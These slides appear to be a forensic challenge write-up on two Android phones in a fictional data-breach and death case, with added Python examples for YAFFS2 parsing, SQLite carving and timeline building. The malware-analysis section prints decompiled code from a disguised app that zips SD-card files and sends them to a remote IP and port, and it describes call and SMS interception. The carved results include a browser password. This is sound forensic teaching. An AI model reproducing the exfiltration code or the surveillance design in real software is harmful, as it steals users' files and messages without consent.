
Turning Android inside out DFRWS 2011 Challenge

Ivo Pooters Fox-IT [email protected]

Case description

•  Android phone 1:
   –  Donald Norby
   –  Dead: what happened?

•  Android phone 2:
   –  Yob Taog
   –  Data breach at SwiftLogic: IP leaked
   –  Guilty?

Data acquisition

•  SD card: regular imaging tools
•  NAND contains multiple partitions:
   –  MTD mounted on /data
   –  MTD mounted on /cache
•  Case 1: root + dd used
   –  No OOB content!
•  Case 2: root + nanddump used
   –  Cross-compile for ARM

The low hanging fruit

Norby’s data

•  9 PDF files in the sdcard/download folder
•  The PDF files contain schematics of SwiftLogic
•  From cache: carved HTML pages of Taog's social media pages and Google searches
•  The cases are linked!

A relevant HTML file

On Norby's phone, in the cache partition

Nice, an IP address! Protected by htaccess.

Directory listing page of Apache

Hm! The origin of the 9 PDF files?

FILE SYSTEM RECONSTRUCTION

Taog’s phone

I would really like to perform a keyword search now, but the tools don't understand YAFFS2 images

Rebuilding file system

•  Use a mobile forensic toolkit (UFED, XRY)
•  Use unyaffs2 (http://code.google.com/p/yaffs2utils)
   –  Doesn't work properly on 'real' images
•  Use the Android emulator
   –  Extract files using adb
•  Rebuild the Linux kernel with YAFFS2 support

YAFFS2 in linux

1.  Clean Ubuntu installation
2.  Get the YAFFS2 source repository (http://www.aleph1.co.uk/gitweb?p=yaffs2.git;a=summary)
3.  Patch it into the kernel
4.  Use nandsim to simulate a NAND device
5.  Use nandwrite to write the image to the device
    –  Don't forget the -r switch for the OOB bytes
    –  nandwrite -a -r /dev/mtdX ~/DFRWS/mtdX.dd

And presto: mount /dev/mtdblock0 /mnt/case2/data

fox@server1104:/mnt/case2/data$ ls -l
total 27
drwxrwx--x 1 fox  fox  2048 2011-05-05 04:06 anr
drwxrwx--x 1 fox  fox  2048 2011-05-08 05:09 app
drwxrwx--x 1 fox  fox  2048 1970-01-01 01:02 app-private
drwx------ 1 fox  fox  2048 1970-01-01 01:02 backup
-rw-rw-rw- 1 root root    8 2011-05-11 02:45 cc_data
drwxrwx--x 1 fox  fox  2048 2011-05-08 05:09 dalvik-cache
drwxrwx--x 1 fox  fox  2048 2011-05-08 05:09 data
drwxr-x--- 1 root 1007 2048 1970-01-01 01:02 dontpanic
drwxrwx--x 1 2000 2000 2048 1970-01-01 01:02 local
drwxrwx--- 1 root root 2048 1970-01-01 01:02 lost+found
drwxrwx--t 1 fox  9998 2048 2011-05-11 02:45 misc
drwx------ 1 root root 2048 2011-05-10 22:43 property
drwxrwxr-x 1 fox  fox  2048 2011-05-11 02:42 system
drwxr-xr-x 1 fox  fox  2048 2011-05-07 18:50 tombstones

UID=1000, GID=1000 (Android's system user; the analysis workstation shows them as its own uid/gid 1000, the user fox)
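The OOB question from the acquisition slides (a dd of /dev/mtdblockX carries no spare-area bytes, a nanddump raw image carries 64 of them behind every 2048-byte page) can be settled from the image itself before anything is written back with nandwrite -r. The script below is an added example, not a tool from the presentation: it scans an image for YAFFS2 object headers at both candidate chunk strides, picks the stride that aligns more headers, and lists the objects it finds. The header layout it assumes follows yaffs_obj_hdr (u32 type, u32 parent id, u16 0xFFFF marker, a 256-byte name at offset 10, two pad bytes, six u32 fields, then the low file-size word at offset 292), the 2048+64 geometry is assumed, and the sample tree (with object ids 1 and 257) is constructed.

```python
"""Find YAFFS2 object headers in a NAND image and tell dd-style from raw dumps.

Added example, not from the presentation. Assumed yaffs_obj_hdr layout:
u32 type, u32 parent object id, u16 0xFFFF (unused checksum), 256-byte name
at offset 10, two pad bytes, six u32 fields (mode, uid, gid, atime, mtime,
ctime), so the low 32 bits of the file size sit at offset 292. The 2048-byte
page with a 64-byte spare area is an assumption too.
"""
import struct

CHUNK = 2048                         # assumed NAND page (data) size
OOB = 64                             # assumed spare-area size per page
OBJ_TYPES = {1: "file", 2: "symlink", 3: "directory", 4: "hardlink", 5: "special"}


def parse_obj_header(chunk):
    """Return a dict if the chunk starts with a plausible object header, else None."""
    if len(chunk) < 296:
        return None
    otype, parent, marker = struct.unpack("<IIH", chunk[:10])
    if otype not in OBJ_TYPES or marker != 0xFFFF:
        return None
    name = chunk[10:266].split(b"\x00", 1)[0]
    if not name or any(b < 0x20 or b > 0x7E for b in name):
        return None                  # unprintable name: a data chunk that happened to match
    size = struct.unpack("<I", chunk[292:296])[0]
    return {"type": OBJ_TYPES[otype], "parent": parent, "name": name.decode("ascii"), "size": size}


def detect_stride(image):
    """Choose 2048 (data only, dd) or 2112 (data + OOB, nanddump raw): whichever
    aligns more object headers. A raw dump read at 2048 misaligns after chunk 0."""
    best_stride, best_hits = CHUNK, -1
    for stride in (CHUNK, CHUNK + OOB):
        hits = sum(1 for off in range(0, len(image) - CHUNK + 1, stride)
                   if parse_obj_header(image[off:off + CHUNK]))
        if hits > best_hits:
            best_stride, best_hits = stride, hits
    return best_stride


def list_objects(image, stride=None):
    """Enumerate object headers (name, type, parent, size) at the detected stride.
    Without the OOB tags this yields the directory tree but not which data chunks
    belong to which file, which is why full reconstruction still needs the OOB."""
    stride = stride or detect_stride(image)
    found = []
    for off in range(0, len(image) - CHUNK + 1, stride):
        hdr = parse_obj_header(image[off:off + CHUNK])
        if hdr:
            hdr["offset"] = off
            found.append(hdr)
    return found


def make_header_chunk(otype, parent, name, size=0):
    """Constructed object-header chunk in the assumed layout; unused bytes are 0xFF."""
    body = struct.pack("<IIH", otype, parent, 0xFFFF)
    body += name.encode("ascii").ljust(256, b"\x00") + b"\xff\xff"   # name + pad -> 268
    body += struct.pack("<6I", 0o100644, 1000, 1000, 0, 0, 0)          # mode..ctime -> 292
    body += struct.pack("<I", size)
    return body.ljust(CHUNK, b"\xff")


def build_sample_images():
    """Constructed tree: a 'data' directory (object id 257 assumed) under the root
    (object id 1) holding two database files. Returns (dd_image, raw_image)."""
    chunks = [
        make_header_chunk(3, 1, "data"),                   # directory under root
        make_header_chunk(1, 257, "contacts.db", 4096),    # file inside that directory
        bytes(range(256)) * 8,                             # a data chunk, not a header
        make_header_chunk(1, 257, "mmssms.db", 2048),
    ]
    data_only = b"".join(chunks)
    raw = b"".join(c + b"\xff" * OOB for c in chunks)      # erased spare area stands in for tags
    return data_only, raw


if __name__ == "__main__":
    for label, img in zip(("dd image", "raw image"), build_sample_images()):
        stride = detect_stride(img)
        print(f"{label}: stride {stride} ({'with' if stride > CHUNK else 'without'} OOB)")
        for obj in list_objects(img, stride):
            print(f"  {obj['offset']:>6} {obj['type']:<9} parent={obj['parent']} "
                  f"size={obj['size']} {obj['name']}")
```

On a real dump the stride that wins by a wide margin tells you whether nandwrite needs -r; if both strides find only a handful of headers the geometry assumption (page and spare size) is probably wrong for that chip and should be taken from the MTD info instead.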

A suspicious application

•  Perform keyword search
   –  Phone numbers, names, other relevant terms
•  Hit on IP address 50.56.29.109
•  /data/dalvik-cache/data@[email protected]@classes.dex

Hmm!

MALWARE ANALYSIS

Taog's phone

What is that IP address doing in this application??

com.andriod.mm

•  Not in the Android Market
•  data/system/packages.xml
   –  Installed on the evening the phone was bought
•  Retrieve the APK for reverse engineering: Data/apps/com.andriod.mm
   –  Unzip it!
•  Convert the dex (bytecode) to a regular jar
   –  dex2jar

Analysis of androidManifest.xml

<uses-sdk android:minSdkVersion="3" android:targetSdkVersion="4" />
<uses-permission android:name="android.permission.INTERNET" />
<uses-permission android:name="android.permission.READ_PHONE_STATE" />
<uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED" />
<uses-permission android:name="android.permission.PROCESS_OUTGOING_CALLS" />   [!] Permissions
<receiver android:name="com.andriod.mm.bootComp">   [!] Triggers
  <intent-filter>
    <action android:name="android.intent.action.AIRPLANE_MODE_CHANGED" />
    <action android:name="android.intent.action.BOOT_COMPLETED" />
    <action android:name="android.intent.action.SCREEN_OFF" />
  </intent-filter>
</receiver>   [!]

Use apktool (code.google.com/p/android-apktool)
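The manifest review above picks out the permissions and the receiver's triggers by eye. The script below is an added example, not part of the presentation: it does the same triage mechanically, parsing the fragment from the slide wrapped in a constructed <manifest>/<application> root so it is well-formed XML, listing the declared permissions, flagging those on an assumed watchlist, and reporting which broadcast actions each receiver reacts to and whether the package declares any launcher activity at all. Inside a real APK the manifest is binary XML and has to be decoded first, for example with apktool as named on the slide.

```python
"""Triage an AndroidManifest.xml: permissions and broadcast triggers.

Added example, not from the presentation. The manifest text is the fragment
shown on the slide wrapped in a constructed <manifest>/<application> root;
the watchlist is an assumption of what an analyst would flag.
"""
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"
NAME = f"{{{ANDROID_NS}}}name"          # ElementTree's Clark notation for android:name

# Constructed wrapper around the elements quoted on the slide.
MANIFEST = f"""<manifest xmlns:android="{ANDROID_NS}" package="com.andriod.mm">
  <uses-sdk android:minSdkVersion="3" android:targetSdkVersion="4" />
  <uses-permission android:name="android.permission.INTERNET" />
  <uses-permission android:name="android.permission.READ_PHONE_STATE" />
  <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED" />
  <uses-permission android:name="android.permission.PROCESS_OUTGOING_CALLS" />
  <application>
    <receiver android:name="com.andriod.mm.bootComp">
      <intent-filter>
        <action android:name="android.intent.action.AIRPLANE_MODE_CHANGED" />
        <action android:name="android.intent.action.BOOT_COMPLETED" />
        <action android:name="android.intent.action.SCREEN_OFF" />
      </intent-filter>
    </receiver>
  </application>
</manifest>"""

# Assumed watchlist: permissions that give network egress, identity, or call/SMS reach.
WATCHLIST = {
    "android.permission.INTERNET",
    "android.permission.READ_PHONE_STATE",
    "android.permission.PROCESS_OUTGOING_CALLS",
    "android.permission.RECEIVE_BOOT_COMPLETED",
    "android.permission.RECEIVE_SMS",
    "android.permission.SEND_SMS",
}


def triage(manifest_xml):
    """Return the package name, its permissions, those on the watchlist, the
    broadcast actions each receiver listens for, and whether any activity is
    registered in the launcher (a package with none runs without a visible UI)."""
    root = ET.fromstring(manifest_xml)
    perms = sorted(e.get(NAME) for e in root.iter("uses-permission"))
    receivers = {r.get(NAME): sorted(a.get(NAME) for a in r.iter("action"))
                 for r in root.iter("receiver")}
    has_launcher = any(c.get(NAME) == "android.intent.category.LAUNCHER"
                       for c in root.iter("category"))
    return {
        "package": root.get("package"),
        "permissions": perms,
        "flagged": sorted(set(perms) & WATCHLIST),
        "receivers": receivers,
        "has_launcher": has_launcher,
    }


if __name__ == "__main__":
    for key, value in triage(MANIFEST).items():
        print(f"{key}: {value}")
```

The combination the slide marks with [!] comes out directly: PROCESS_OUTGOING_CALLS plus INTERNET, and a receiver that wakes on BOOT_COMPLETED, SCREEN_OFF and AIRPLANE_MODE_CHANGED, which is what lets the package run without the user ever opening it.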

Analysis of java code

[…]
private static final String DEFAULTHOST = "50.56.29.109";
private static final int DEFAULTPORT = 10001;
[…]
int sendFile(String s) {
    […]
    socket = SocketFactory.getDefault().createSocket("50.56.29.109", 10001);
    outputstream = socket.getOutputStream();
    outputstream1.write(abyte2, k1, l1);
    […]

Use JD-GUI for decompilation (java.decompiler.free.fr/?q=jdgui)

Apparently files are sent to this server

Analysis of java code (2)

•  Secretly steals SD data:
   –  On trigger, the SD card is scanned for files
   –  Files zipped and sent to 50.56.29.109:10001
   –  SMS “pkg uploaded”
•  Monitors calls
   –  SMS “Callin” + number + date/time
•  Monitors received text messages and forwards them
   –  SMS “FORWARDED SMS from” + originating address + “ at” + date/time + “: ksms” + message

CARVING SQLITE RECORDS

Norby's phone

Now, let's examine Norby's phone

About YAFFS2 out of band bytes

[Figure: YAFFS2 chunk layout. Chunks labelled Header, Data 1, Data 2 of one object are interleaved with chunks of other objects, illustrating high fragmentation]

High fragmentation

Challenge

•  The user data and cache partitions are YAFFS2 formatted.
•  Remember, we don't have the OOB bytes
   –  File reconstruction is very difficult, to say the least
•  Regular carving tools perform poorly
•  But we really want those SQLite records

SQLite format

[Figure: SQLite b-tree layout. A root page points to interior pages, which point to leaf pages; the schema and the SQLite signature are stored in the root page. Each page consists of a page header, a cell pointer array, an unallocated area and the cell content area (offset counted from the start of the page); the data records are in the cell content area. Pages are not fragmented.]

The idea

1.  Identify SQLite pages in the raw YAFFS2 image by page signature
2.  Parse out the records using the cell pointer array.
3.  Match the anonymous records against predefined templates.
    –  Analyze important SQLite databases for table format
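The three steps above, as an added example that is not the presenter's tool: pages are recognised by the table-leaf page-header signature (type byte 0x0D and a cell pointer array that fits the page), each page is split into cells via that pointer array and every cell's record header (serial types) and body are decoded, and the resulting anonymous records are matched against a column-kind template. The 1024-byte page size, the calls template (INTEGER PRIMARY KEY stored as NULL, then text, int, int, int, text) and the sample rows are assumptions; the input is constructed by creating a real SQLite database, reversing its page order and burying the pages between junk pages, standing in for the fragmented YAFFS2 image. The database file header is reported separately, since that is where the signature and schema live.

```python
"""Carve SQLite table-leaf pages and their records out of a raw image.
Added example, not the presenter's tool; page size, template and sample rows
are assumptions for the constructed input (see the lead-in above)."""
import os
import sqlite3
import struct
import tempfile

PAGE_SIZE = 1024      # assumed database page size
LEAF_TABLE = 0x0D     # page-type byte of a table b-tree leaf page
# Constructed template: calls table column kinds; the INTEGER PRIMARY KEY is stored as NULL.
TEMPLATES = {"calls": ["null", "text", "int", "int", "int", "text"]}
SAMPLE_CALLS = [("5550100", 1304654400000, 341, 2, "contact one (constructed)"),  # constructed:
                ("5550199", 1304740800000, 91, 2, "contact two (constructed)")]   # number, epoch ms, duration, type, name

def read_varint(buf, pos):
    """Decode an SQLite varint: big-endian, 7 bits per byte, at most 9 bytes."""
    value = 0
    for i in range(8):
        b = buf[pos + i]
        value = (value << 7) | (b & 0x7F)
        if b < 0x80:
            return value, pos + i + 1
    return (value << 8) | buf[pos + 8], pos + 9          # 9th byte carries 8 bits

def decode_value(stype, buf, pos):
    """Decode one column from its record serial type -> (value, next pos)."""
    if stype in (0, 8, 9):
        return (None if stype == 0 else stype - 8), pos   # NULL, literal 0, literal 1
    if stype == 7:
        return struct.unpack(">d", buf[pos:pos + 8])[0], pos + 8
    if stype <= 6:
        n = (1, 2, 3, 4, 6, 8)[stype - 1]
        return int.from_bytes(buf[pos:pos + n], "big", signed=True), pos + n
    if stype < 12:
        raise ValueError("reserved serial type")
    n = (stype - 12) // 2                                 # blob (even) or text (odd)
    raw = buf[pos:pos + n]
    return (raw.decode("utf-8", "replace") if stype % 2 else bytes(raw)), pos + n

def parse_leaf_page(page):
    """Steps 1 and 2: check the table-leaf signature, then walk the cell pointer array."""
    ncells, content = struct.unpack(">HH", page[3:7])
    if page[0] != LEAF_TABLE or ncells == 0 or not 8 + 2 * ncells <= (content or 65536) <= len(page):
        return []                                         # no signature / pointer array would not fit
    rows = []
    for i in range(ncells):
        try:
            off = struct.unpack(">H", page[8 + 2 * i:10 + 2 * i])[0]
            payload_len, p = read_varint(page, off)
            rowid, p = read_varint(page, p)
            if payload_len > len(page) - p:
                continue                                  # overflow pages not handled
            hdr_len, q = read_varint(page, p)
            types = []
            while q < p + hdr_len:                        # record header: serial types
                t, q = read_varint(page, q)
                types.append(t)
            vals = []
            for t in types:                               # record body: column values
                v, q = decode_value(t, page, q)
                vals.append(v)
            rows.append((rowid, vals))
        except (IndexError, ValueError, struct.error):
            continue                                      # damaged cell: skip it
    return rows

def match_template(vals, template):
    """Step 3: column count and kinds must agree; NULL is accepted in any column."""
    kinds = {type(None): "null", int: "int", float: "real", str: "text", bytes: "blob"}
    return len(vals) == len(template) and all(
        v is None or kinds[type(v)] == k for v, k in zip(vals, template))

def carve(image, templates=TEMPLATES, page_size=PAGE_SIZE):
    """Scan at page stride -> ([(offset, declared page size)], [(offset, table, rowid, values)])."""
    headers, hits = [], []
    for off in range(0, len(image) - page_size + 1, page_size):
        page = image[off:off + page_size]
        if page[:16] == b"SQLite format 3\x00":           # file header: schema lives here
            headers.append((off, struct.unpack(">H", page[16:18])[0]))
        else:
            hits += [(off, t, rowid, vals) for rowid, vals in parse_leaf_page(page)
                     for t, tmpl in templates.items() if match_template(vals, tmpl)]
    return headers, hits

def build_sample_image():
    """Constructed input: a real calls database, pages reversed and buried in junk."""
    with tempfile.TemporaryDirectory() as d:
        con = sqlite3.connect(os.path.join(d, "calls.db"))
        con.execute(f"PRAGMA page_size={PAGE_SIZE}")
        con.execute("CREATE TABLE calls(_id INTEGER PRIMARY KEY, number TEXT, "
                    "date INTEGER, duration INTEGER, type INTEGER, name TEXT)")
        con.executemany("INSERT INTO calls VALUES (NULL,?,?,?,?,?)", SAMPLE_CALLS)
        con.commit()
        con.close()
        with open(os.path.join(d, "calls.db"), "rb") as f:
            db = f.read()
    pages = [db[i:i + PAGE_SIZE] for i in range(0, len(db), PAGE_SIZE)]
    return b"".join(os.urandom(PAGE_SIZE) + p for p in reversed(pages))
```

A call such as carve(build_sample_image()) returns the header hit (with page size 1024 read from offset 16) and one tuple per record that fits the calls template; the template is what turns a carved page back into a named table, since the page itself carries no schema. Records that spill into overflow pages are skipped rather than guessed, and a damaged cell only loses that cell, not the page.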

Results (Contacts)

id  number      date/time (utc)         duration  type  name
1   4439264768  05/04/2011 11:31:08 PM  341       Out   Mr X
2   4124623802  05/05/2011 12:04:01 AM  91        Out
3   4439264768  05/05/2011 12:38:17 AM  115       Out   Mr X
4   4124623802  05/05/2011 03:18:33 PM  84        Out
5   4439264768  05/08/2011 06:46:24 PM  381       In    Mr X

Id  display name  extra info
1   Mr X          mre@hushmail.com • 443-926-4768 • Mr X
2   Taog          Taog Taog • 4124393388
3   mr e          4439264768 • mr

Results (SMS)

154  4124393388  05/08/2011 04:12:16 AM  1  in       ksmsv[?]wsms://message/pkg uploaded[?]
154  4124393388  05/08/2011 04:12:16 AM  0  in       ksmsv[?]wsms://message/pkg uploaded[?]
155              05/08/2011 04:13:48 AM  1  draft    Got something for you, sample shortly
155              05/08/2011 05:31:28 PM  1  draft    Got something for you, sample shortly
155  4439264768  05/08/2011 06:05:34 PM  1  pending  Got some results, I think we need to up the fee, say double?
155  4439264768  05/08/2011 06:05:34 PM  1  out      Got some results, I think we need to up the fee, say double?
156  4439264768  05/08/2011 06:16:14 PM  0  in       You are joking, right? You can't seriously think about changing the deal now.
156  4439264768  05/08/2011 06:16:14 PM  1  in       You are joking, right? You can't seriously think about changing the deal now.
157  4439264768  05/08/2011 06:22:39 PM  1  pending  I just sent you a sample, I think you'll be pleased...
157  4439264768  05/08/2011 06:22:39 PM  1  out      I just sent you a sample, I think you'll be pleased...
158  4439264768  05/08/2011 06:30:13 PM  0  in       You are serious then. I can see the information is valuable but I am displeased with you breaking the deal.
158  4439264768  05/08/2011 06:30:13 PM  1  in       You are serious then. I can see the information is valuable but I am displeased with you breaking the deal.
159  4439264768  05/08/2011 06:56:44 PM  1  pending  I knew you'd like them, ill be at the agreed spot, in about 25 min for the exchange
159  4439264768  05/08/2011 06:56:44 PM  1  out      I knew you'd like them, ill be at the agreed spot, in about 25 min for the exchange

Results (Browser)

id  host          username  password
1   50.56.29.109  norby     aaassspp

Id  Date/time               Title                                          URL                                            Visits
34  05/06/2011 06:27:36 PM  yob_taog - Twitter Search                      http://search.twitter.com/search?q=yob_taog    1
34  05/06/2011 06:27:36 PM                                                 http://search.twitter.com/search?q=yob_taog    1
35  05/06/2011 06:27:47 PM                                                 http://m.twitter.com/yob_taog                  1
36  05/06/2011 06:27:47 PM  Twitter                                        http://mobile.twitter.com/yob_taog             1
36  05/06/2011 06:27:47 PM                                                 http://mobile.twitter.com/yob_taog             1
37  05/06/2011 06:28:09 PM  Twitpic - Share photos and videos on Twitter   http://twitpic.com/4tscf6                      1
37  05/06/2011 06:28:09 PM                                                 http://twitpic.com/4tscf6                      1
38  05/06/2011 06:28:26 PM  Twitpic - Share photos and videos on Twitter   http://twitpic.com/4tvmcu                      1
38  05/06/2011 06:28:26 PM                                                 http://twitpic.com/4tvmcu                      1
16  05/08/2011 05:58:34 PM                                                 http://www.google.com/m?source=android-home    3
39  05/08/2011 05:59:28 PM                                                 http://50.56.29.109/ss/                        1
39  05/08/2011 05:59:28 PM  Index of /ss                                   http://50.56.29.109/ss/                        1
39  05/08/2011 06:28:05 PM  Index of /ss                                   http://50.56.29.109/ss/                        2

CONNECTING THE DOTS Conclusion

Creating the timeline

•  Normalize all times to UTC
•  Determine the timezone of each source
•  Analyst's Notebook for the timeline
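The two bullets about UTC and per-source timezones are where timelines go wrong, so here is an added example (not the presenter's Analyst's Notebook workflow) of the normalisation step: Android's sms and calls tables store milliseconds since the Unix epoch, which are UTC by definition, while carved text such as a server directory listing shows wall-clock time in a zone the analyst has to determine for that source. The sources, the fixed-offset zone and the events are constructed.

```python
"""Merge events from several sources into one UTC timeline.

Added example, not from the presentation. Epoch-millisecond values (as in
Android's sms and calls databases) are UTC already; text timestamps are
localised with a zone recorded per source. Sources, zones and events are
constructed.
"""
from datetime import datetime, timedelta, timezone

# Assumed per-source zones for text timestamps; epoch-ms sources need none.
SOURCE_TZ = {
    "norby_sms": None,                                       # epoch ms from mmssms.db
    "taog_calls": None,                                      # epoch ms from contacts2.db
    "portal_listing": timezone(timedelta(hours=-4), "EDT"),  # text; constructed fixed offset
}


def to_utc(source, value):
    """Epoch milliseconds map straight to UTC; text times get the source's zone
    first. Mixing the two without this step misorders events across sources."""
    if isinstance(value, int):
        return datetime.fromtimestamp(value / 1000, tz=timezone.utc)
    tz = SOURCE_TZ.get(source)
    if tz is None:
        raise ValueError(f"no zone known for text timestamps from {source!r}")
    local = datetime.strptime(value, "%Y-%m-%d %H:%M:%S").replace(tzinfo=tz)
    return local.astimezone(timezone.utc)


def build_timeline(events):
    """events: (source, timestamp, description) -> [(utc text, source, description)]
    sorted by normalised time."""
    rows = sorted((to_utc(src, ts), src, desc) for src, ts, desc in events)
    return [(t.strftime("%Y-%m-%d %H:%M:%S"), src, desc) for t, src, desc in rows]


# Constructed events: epoch ms for the phone databases, text for the listing.
EVENTS = [
    ("taog_calls", 1304874600000, "outgoing call"),
    ("norby_sms", 1304877000000, "SMS received (constructed body)"),
    ("portal_listing", "2011-05-08 13:00:00", "upload directory listing modified"),
]

if __name__ == "__main__":
    for row in build_timeline(EVENTS):
        print(*row)
```

Without the zone step the listing entry (13:00 local) would sort hours before the call (17:10 UTC); with it the three events line up as listing 17:00, call 17:10, SMS 17:50 UTC.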

Timeline

[Timeline charts: three slides from Analyst's Notebook; images not included]

Conclusions/Reconstruction

•  Taog is the victim of an attack
•  Malware installed on his device at the phone shop before purchase
•  The schematics of SwiftLogic were secretly uploaded to the web portal
•  Norby downloaded the schematics
•  Norby tries to get more out of the deal
•  …and gets killed by Mr E